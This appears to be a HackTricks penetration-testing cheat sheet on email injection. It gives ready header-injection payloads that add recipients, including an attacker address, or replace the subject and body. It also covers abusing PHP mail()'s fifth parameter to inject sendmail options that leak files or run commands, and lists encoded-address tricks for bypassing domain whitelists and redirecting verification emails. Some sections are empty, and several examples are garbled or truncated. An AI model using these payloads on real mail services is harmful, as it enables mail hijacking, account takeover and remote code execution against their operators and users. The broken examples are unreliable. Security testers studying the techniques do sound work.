# Email Injections
\
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks\&utm_medium=text\&utm_campaign=ppc\&utm_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## Inject in sent e-mail
### Inject Cc and Bcc after sender argument
```
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
```
The message will be sent to the recipient and recipient1 accounts.
### Inject argument
```
From:sender@domain.com%0ATo:attacker@domain.com
```
The message will be sent to the original recipient and the attacker account.
### Inject Subject argument
```
From:sender@domain.com%0ASubject:This is%20Fake%20Subject
```
The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.
### Change the body of the message
Inject a two-line feed, then write your message to change the body of the message.
```
From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.
```
### PHP mail() function exploitation
```bash
# The function has the following definition:
php --rf mail
Function [ function mail ] {
- Parameters [5] {
Parameter #0 [ $to ]
Parameter #1 [ $subject ]
Parameter #2 [ $message ]
Parameter #3 [ $additional_headers ]
Parameter #4 [ $additional_parameters ]
}
}
```
#### The 5th parameter ($additional\_parameters)
This section is going to be based on **how to abuse this parameter supposing that an attacker controls it**.
This parameter is going to be added to the command line PHP will be using to invoke the binary sendmail. However, it will be sanitised with the function `escapeshellcmd($additional_parameters)`.
An attacker can **inject extract parameters for sendmail** in this case.
#### Differences in the implementation of /usr/sbin/sendmail
**sendmail** interface is **provided by the MTA email software** (Sendmail, Postfix, Exim etc.) installed on the system. Although the **basic functionality** (such as -t -i -f parameters) remains the **same** for compatibility reasons, **other functions and parameters** vary greatly depending on the MTA installed.
Here are a few examples of different man pages of sendmail command/interface:
* Sendmail MTA: http://www.sendmail.org/\~ca/email/man/sendmail.html
* Postfix MTA: http://www.postfix.org/mailq.1.html
* Exim MTA: https://linux.die.net/man/8/eximReferences
Depending on the **origin of the sendmail** binary different options have been discovered to abuse them and l**eak files or even execute arbitrary commands**. Check how in [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
## Inject in the e-mail name
{% hint style="danger" %}
Note that if you manage to create an account in a service with an arbitrary domain name (like Github, Gitlab, CloudFlare Zero trust...) and verify it receiving the verification email in your mail address, you might be able to access sensitive locations of the victim company
{% endhint %}
### Ignored parts of an email
The symbols: **+, -** and **{}** in rare occasions can be used for tagging and ignored by most e-mail servers
* E.g. john.doe+intigriti@example.com β john.doe@example.com
**Comments between parentheses ()** at the beginning or the end will also be ignored
* E.g. john.doe(intigriti)@example.com β john.doe@example.com
### Whitelist bypass
### Quotes
### IPs
You can also use IPs as domain named between square brackets:
* john.doe@\[127.0.0.1]
* john.doe@\[IPv6:2001:db8::1]
### Email Encoding
As explained in [**this research**](https://portswigger.net/research/splitting-the-email-atom), email names also can also contain encoded characters:
* **PHP 256 overflow**: PHP `chr` function will continue adding 256 to a char until it becames positive and then do the operation `%256`.
* `String.fromCodePoint(0x10000 + 0x40) // π β @`
{% hint style="success" %}
The goal of this trick is to end with an injection like `RCPT TO:<"collab@psres.net>collab"@example.com>`\
that will send the verification email to a different email address from the expected one (therefore to introduce another email address inside the email name and break the syntax when sending the email)
{% endhint %}
Different encodings:
```bash
# Format
=? utf-8 ? q ? =41=42=43 ?= hi@example.com --> ABChi@example.com
# =? -> Start of encode
# utf-8 -> encoding used
# ? -> separator
# q -> type of encoding
# ? -> separator
# =41=42=43 -> Hex encoded data
# ?= end of encoding
# Other encodings, same example:
#Β iso-8859-1
=?iso-8859-1?q?=61=62=63?=hi@example.com
# utf-8
=?utf-8?q?=61=62=63?=hi@example.com
# utf-7
=?utf-7?q??=hi@example.com
# q encoding + utf-7
=?utf-7?q?&=41?=hi@example.com
# base64
=?utf-8?b?QUJD?=hi@example.com
# bas64 + utf-7
=?utf-7?q??=hi@example.com
#punycode
x@xn--svg/-9x6 β x@